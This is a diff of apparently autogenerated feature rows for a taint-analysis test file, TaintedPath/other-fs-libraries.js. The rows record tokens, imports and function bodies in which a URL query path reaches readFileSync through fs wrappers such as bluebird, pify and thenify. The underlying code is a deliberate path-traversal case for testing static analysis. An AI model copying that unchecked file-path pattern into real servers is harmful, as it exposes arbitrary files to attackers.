autogenerated/TaintedPath/other-fs-libraries.js:41:36:41:47 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:36:41:47 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:36:41:47 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | CalleeFlexibleAccessPath | import(!).promisify() | | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | calleeImports | bluebird | @@ -10009,6 +81012,51 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:41:50:41:53 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:9 | require | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | exceptional return of require("bluebird") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | exceptional return of require("bluebird") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | exceptional return of require("bluebird") | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | exceptional return of require("bluebird") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | exceptional return of require("bluebird") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | require("bluebird") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | require("bluebird") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | require("bluebird") | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | require("bluebird") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:21 | require("bluebird") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:34 | require ... sifyAll | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:34 | require ... sifyAll | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:34 | require ... sifyAll | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:34 | require ... sifyAll | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:34 | require ... sifyAll | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | exceptional return of require ... All(fs) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | exceptional return of require ... All(fs) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | exceptional return of require ... All(fs) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | exceptional return of require ... All(fs) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | exceptional return of require ... All(fs) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | require ... All(fs) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | require ... All(fs) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | require ... All(fs) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | require ... All(fs) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:38 | require ... All(fs) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:51 | require ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:51 | require ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:51 | require ... ileSync | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:51 | require ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:51 | require ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | exceptional return of require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | exceptional return of require ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | exceptional return of require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | exceptional return of require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | exceptional return of require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | require ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:3:42:57 | require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | calleeImports | | @@ -10017,6 +81065,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:42:11:42:20 | "bluebird" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:23:42:34 | promisifyAll | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:23:42:34 | promisifyAll | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:23:42:34 | promisifyAll | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:23:42:34 | promisifyAll | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:23:42:34 | promisifyAll | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | CalleeFlexibleAccessPath | import(!).promisifyAll | | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | calleeImports | bluebird | @@ -10025,6 +81078,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:42:36:42:37 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:42:40:42:51 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:40:42:51 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:42:40:42:51 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:42:40:42:51 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:42:40:42:51 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | CalleeFlexibleAccessPath | import(!).promisifyAll().readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | calleeImports | bluebird | @@ -10033,12 +81091,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:42:53:42:56 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:13 | asyncFS | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:13 | asyncFS | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:13 | asyncFS | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:13 | asyncFS | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS ... odule") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS ... odule") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:7:46:47 | asyncFS ... odule") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:23 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:23 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | exceptional return of require ... odule") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | exceptional return of require ... odule") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | exceptional return of require ... odule") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | require ... odule") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | require ... odule") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:46:17:46:47 | require ... odule") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:46:25:46:46 | "./my-a ... module" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:4 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:4 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:17 | http.createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:48:17 | http.createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:1:64:2 | http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:6:48:17 | createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:6:48:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:6:48:17 | createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | asyncFS | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | asyncFS | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | asyncFS | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | asyncFS | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | asyncFS | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:48:18 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | 'arguments' object of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | exceptional return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | calleeImports | http | @@ -10046,6 +81173,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:19:64:1 | return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:28:48:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:48:33:48:35 | res | contextFunctionInterfaces | getFsModule(special) | +| 